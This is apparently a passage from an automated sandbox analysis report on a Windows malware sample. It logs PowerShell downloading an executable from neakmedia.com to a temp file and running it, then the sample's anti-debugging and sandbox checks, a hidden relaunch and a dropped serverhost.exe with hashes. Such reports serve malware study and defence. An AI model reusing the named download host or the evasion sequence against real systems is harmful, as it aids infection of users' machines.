| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session |
|
1 | ||
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
22 | |
| COM | Get Class ID | cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell |
|
1 | |
| COM | Create | interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = temp, result_out = C:\Users\BGC6U8~1\AppData\Local\Temp |
|
2 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = neakmedia.com, address_out = 70.39.145.109, service = 0 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 70.39.145.109, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 72, size_out = 72 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = neakmedia.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /hybfPDcL/ |
|
1 | |
| Inet | Send HTTP Request | headers = host: neakmedia.com, connection: Keep-Alive, url = neakmedia.com/hybfPDcL/ |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8972 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8972 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe, size = 8575 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3752 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 3752 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4960 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4960 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe, size = 4616 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 23232 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 23232 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe, size = 23232 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 57785, size_out = 45012 |
|
1 | |
| Inet | Read Response | size = 57785, size_out = 45012 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe, size = 45012 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 12773, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 12773, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe, size = 4356 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8417, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 8417, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 6965, size_out = 6965 |
|
1 | |
| Inet | Read Response | size = 6965, size_out = 6965 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe, size = 4321 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes |
|
2 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Process | Create | process_name = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, show_window = SW_SHOWNORMAL |
|
1 |
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\users\bgc6u8~1\appdata\local\temp\42753.exe |
| Command Line | "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:38 |
| Information | Value |
|---|---|
| PID | 0xad0 |
| Parent PID | 0xa68 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AD4
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Debug | Check for Presence | c:\users\bgc6u8~1\appdata\local\temp\42753.exe |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x76890000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetMessagePos, address_out = 0x768c6703 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x765e2fb6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineA, address_out = 0x765e98ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x765e395c |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x772a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = cos, address_out = 0x772e7400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = sin, address_out = 0x772d41c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x772e7690 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x76b40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Debug | Check for Presence | c:\users\bgc6u8~1\appdata\local\temp\42753.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| System | Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 259 |
|
1 | |
| Debug | Check for Presence | c:\users\bgc6u8~1\appdata\local\temp\42753.exe |
|
249 | |
| Module | Load | module_name = winhttp.dll, base_address = 0x71a10000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76f00000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x77040000 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8~1\appdata\local\temp\42753.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = MACA73F0A |
|
1 | |
| Process | Create | process_name = C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe, os_pid = 0xae4, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\bgc6u8~1\appdata\local\temp\42753.exe |
| Command Line | "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:50, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:35 |
| Information | Value |
|---|---|
| PID | 0xae4 |
| Parent PID | 0xad0 (c:\users\bgc6u8~1\appdata\local\temp\42753.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AE8
0x
AEC
0x
AF0
0x
AF4
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 100.00 KB (102400 bytes) |
MD5:
d6c8126371d37ffe3100755db6aa22ed
SHA1: 294b381e200aa3f343989877c9ef5efdda25ca42 SHA256: fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec |
|
|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 92.00 KB (94208 bytes) |
MD5:
2b8584cab96d20ee851054f9fedef7f3
SHA1: de72320cc8fc12f2e410afa07809b620f81066dc SHA256: f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1 |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Debug | Check for Presence | c:\users\bgc6u8~1\appdata\local\temp\42753.exe |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x76890000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetMessagePos, address_out = 0x768c6703 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\user32.dll, function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbc4 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fbe4 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fc28 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x764f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76590000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
